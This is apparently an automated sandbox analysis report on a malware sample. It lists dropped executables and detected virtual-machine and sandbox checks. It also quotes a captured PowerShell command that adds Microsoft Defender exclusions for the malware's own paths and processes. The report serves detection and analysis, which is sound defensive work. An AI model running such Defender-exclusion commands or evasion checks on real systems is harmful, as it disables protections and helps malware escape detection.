Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Windows.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: TypeId.exe, 0000000C.00000002.1928228831.000001D9987E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE.CONFIG
Source: 52i.exe, 00000003.00000002.1762236134.00000202E7D4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2226385244.0000020359561000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE,C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\LOCAL\TEMP\ -FORCE; ADD-MPPREFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D998776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMDEBUGLOG_TYPEID.EXE_7468.TXT
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A4D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ADD-MPPREFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: 52i.exe, 00000003.00000002.1747925606.000000EA36FE2000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: PEID.EXE
Source: TypeId.exe, 0000000C.00000002.1976643095.000001D99A594000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 6FILE:///C:/USERS/user/APPDATA/ROAMING/GUID/TYPEID.EXE
Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000000.1807181029.0000000000E02000.00000002.00000001.01000000.00000010.sdmp, ix4A2DreBBsQwY6YHkidcDjo.exe.8.dr, HM3SOlbpH71yEXUIEAOeIiGX.exe.8.dr, FRaqbC8wSA1XvpFVjCRGryWt.exe.8.dr	Binary or memory string: SBIEDLL.DLLCYPRXF4YDFY6QMQHUAXZT5XLEAGZGVJ3A0GTSHCUZNG06Y5STECU0VFHSQJW8F9JVXKHIZOE3AKCLUOQWFHDGCKXZU8MLY2AIRDMC4ZKAOLOTU0OP35YNQFJXNACVRI1O5YC8G65GRE3VQLU3ILCNNCDKTAI1U61CGKVFHFGDS6ABUAJ4CPKYCVYNZFVRTG8CHS1VDCZCHBDLKTDPNQWQKMSFLTBTZNXIDYAJWWSIZWFBCL7VYZ2LPUJ3GCJHXOE42DJINC9H5K5AGSJQMP8HV7AX4J94NTHIOF0K5ACLEKPCPSFME7TKJRC45CKXXDHYXUEKBVGDJLHVKZY5XDQVJBCFQ9OOUCCEEILJSWQUHXZ8S2UYL5DT63P3LIW7SPVRA0ABTNT91H5XMQ1C7F8XHDDJNWN6EOHW3HG9SOGOGADEQA5U71OGSHQYSBBEV6LPZC3C0VGSTLA8FFNOWMZA72I0XSI7ALQJN2HFITO6ZQFFB87JJA3CETI1BTNOUIRFPUCCHJ2LGWTHJYAGJI7PFFCOSVPKFZOOFBBPNCE1LYP96B0AVSJD670IMO5OC4IRI8OAPZAAJH5KZXI4Q8EXPPSCHX0GTXXDRQ6PJXSK6NWIOUQLPSUWJX4CNVETJSLZNPUS1JKDWCYP93OZBIIMYY4PG58CDFARWFX1YWVGE1PJ8LZR9TMVNUVEGAACJJNTK9EXVQA7K4AU4N4RZIZRTGDKNT9XUK8PUI6GT1KPGERR9INFO
Source: 52i.exe, 00000003.00000002.1755825606.0000020280939000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <\MICROSOFT\WINDOWS\GUID\TYPEIDGUID\TYPEID.EXE011)
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D998770000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_APPHELPDEBUG_TYPEID.EXE_7468.TXT
